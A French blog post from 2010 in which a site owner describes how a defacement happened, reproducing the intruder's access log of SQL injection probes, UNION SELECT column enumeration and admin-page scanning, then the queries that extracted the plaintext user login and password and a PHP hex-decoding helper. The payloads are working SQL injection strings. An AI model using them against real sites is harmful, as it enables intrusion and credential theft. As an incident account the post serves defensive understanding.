PlaceOweb Dotclear

Aller au contenu | Aller au menu | Aller à la recherche

« WampServer PHP 5.3.3 - Exécuter PHP sur serveur web JAVA »

H4cked By S3nleVeyaSensiz Turkish Attacker One Turk Against The World

Par PlaceOweb le vendredi, juillet 30 2010, 19:29 - SQL - Lien permanent

sql

Hack de votre site avec le message H4cked By S3nleVeyaSensiz Turkish Attacker One Turk Against The World, bravo ! Vous avez une faille, et avez été victime d'une injection MySQL.

Pour notre part tout a commencé avec un dossier web listé et sans index (Options +Indexes)

Puis de la détection d'injection SQL

78.171.57.168 - - [27/Jul/2010:15:37:05 +0200] "GET /pages/dossier.php?id=23%27 HTTP/1.1" 200 138
78.171.57.168 - - [27/Jul/2010:15:37:11 +0200] "GET /pages/dossier.php?id=23 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:13 +0200] "GET /pages/dossier.php?id=-9.9 HTTP/1.1" 200 11642
78.171.57.168 - - [27/Jul/2010:15:37:16 +0200] "GET /pages/dossier.php?id=23%20and%201=1 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:19 +0200] "GET /pages/dossier.php?id=23%20and%201=0 HTTP/1.1" 200 11642
78.171.57.168 - - [27/Jul/2010:15:37:21 +0200] "GET /pages/dossier.php?id=23%20and%201=1 HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:24 +0200] "GET /pages/dossier.php?id=23' HTTP/1.1" 200 162
78.171.57.168 - - [27/Jul/2010:15:37:24 +0200] "GET /pages/dossier.php?id=/*!30000%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:27 +0200] "GET /pages/dossier.php?id=/*!40100%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:30 +0200] "GET /pages/dossier.php?id=/*!50000%2023*/ HTTP/1.1" 200 29513
78.171.57.168 - - [27/Jul/2010:15:37:32 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 76
78.171.57.168 - - [27/Jul/2010:15:37:33 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- HTTP/1.1" 200 11672
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=23%20UNION%20ALL%20SELECT%20null,null,null,null,null%20from%20msdb..backupfile-- HTTP/1.1" 200 174
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=23%20UNION%20ALL%20SELECT%20null,null,null,null,null%20from%20mysql.db-- HTTP/1.1" 200 81
78.171.57.168 - - [27/Jul/2010:15:37:36 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%20concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),2,3,4,5-- HTTP/1.1" 200 11645
78.171.57.168 - - [27/Jul/2010:15:37:39 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),3,4,5-- HTTP/1.1" 200 11669
78.171.57.168 - - [27/Jul/2010:15:37:43 +0200] "GET /pages/dossier.php?id=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,Hex(cast(database()%20as%20char)),0x27,0x7e),3,4,5-- HTTP/1.1" 200 11670
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin.asp HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.html HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.htm HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login/ HTTP/1.1" 404 340
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.php HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /login.asp HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/account.html HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/login.html HTTP/1.1" 404 350
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/login.htm HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:00 +0200] "GET /admin/home.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/home.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/controlpanel.html HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/cp.php HTTP/1.1" 404 346
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/cp.asp HTTP/1.1" 404 346
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/adminLogin.html HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/adminLogin.htm HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/admin_login.php HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/admin_login.asp HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:01 +0200] "GET /admin/controlpanel.asp HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/admin-login.php HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/admin-login.asp HTTP/1.1" 404 355
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin-login.php HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin-login.asp HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:02 +0200] "GET /admin/account.php HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/account.asp HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/admin.php HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/admin.asp HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adm/ HTTP/1.1" 404 338
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin/ HTTP/1.1" 302 3602
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin.htm HTTP/1.1" 404 343
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /admin.html HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adminitem/ HTTP/1.1" 404 344
78.171.57.168 - - [27/Jul/2010:15:41:03 +0200] "GET /adminitem.php HTTP/1.1" 404 347
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin/controlpanel.htm HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitem.asp HTTP/1.1" 404 347
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminitems.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/ HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/login.php HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator/login.asp HTTP/1.1" 404 357
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator.php HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administrator.asp HTTP/1.1" 404 351
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration/ HTTP/1.1" 404 349
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration.php HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /administration.asp HTTP/1.1" 404 352
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminLogin/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminlogin.php HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /adminlogin.asp HTTP/1.1" 404 348
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin/controlpanel.php HTTP/1.1" 404 356
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/admin.php HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/admin.asp HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:04 +0200] "GET /admin_area/ HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /admin_area/login.php HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /admin_area/login.asp HTTP/1.1" 404 354
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager/ HTTP/1.1" 404 342
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager.php HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /manager.asp HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein/ HTTP/1.1" 404 342
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein.php HTTP/1.1" 404 345
78.171.57.168 - - [27/Jul/2010:15:41:05 +0200] "GET /letmein.asp HTTP/1.1" 404 345

Puis fait des requêtes pour connaitre connaître la structure des tables accessible, et en fin le log/pass (en clair dans la base :)

mysql> SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x65656565;
+---+
| concat(0x7e,0x27,count(table_name),0x27,0x7e) |
+---+
|                                         |
+---+
1 row in set (0.00 sec)

mysql> SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `mabase`.utilisateurs;
+--+
| concat(0x7e,0x27,count(*),0x27,0x7e) |
+--+
|                                 |
+--+
1 row in set (0.00 sec)

mysql> SELECT concat(0x7e,0x27,Hex(cast(utilisateurs.user_login as char)),0x27,0x7e) FROM `mabase`.utilisateurs LIMIT 0,1;
++
| concat(0x7e,0x27,Hex(cast(utilisateurs.login as char)),0x27,0x7e) |
++
|                                                  |
++
1 row in set (0.02 sec)

mysql> SELECT concat(0x7e,0x27,Hex(cast(utilisateurs.user_pwd as char)),0x27,0x7e) FROM `mabase`.utilisateurs LIMIT 0,1;
+--+
| concat(0x7e,0x27,Hex(cast(utilisateurs.pwd as char)),0x27,0x7e) |
+--+
|                                                      |
+--+
1 row in set (0.00 sec)

Conversion de l'hexadecimal en string

Application only encodes and decodes ASCII text

// Script PHP de conversion hexadecimal vers texte ASCII
function hex2bin($data) {	// 7574696C6973617465757273, pas 0x7574696C6973617465757273	== utilisateurs
	$str = '';
    $len = strlen($data);
    for($i=0;$i<$len;$i+=2) {
        $str .=  pack("C",hexdec(substr($data,$i,2)));
    }
    return $str;
}

Fil des commentaires de ce billet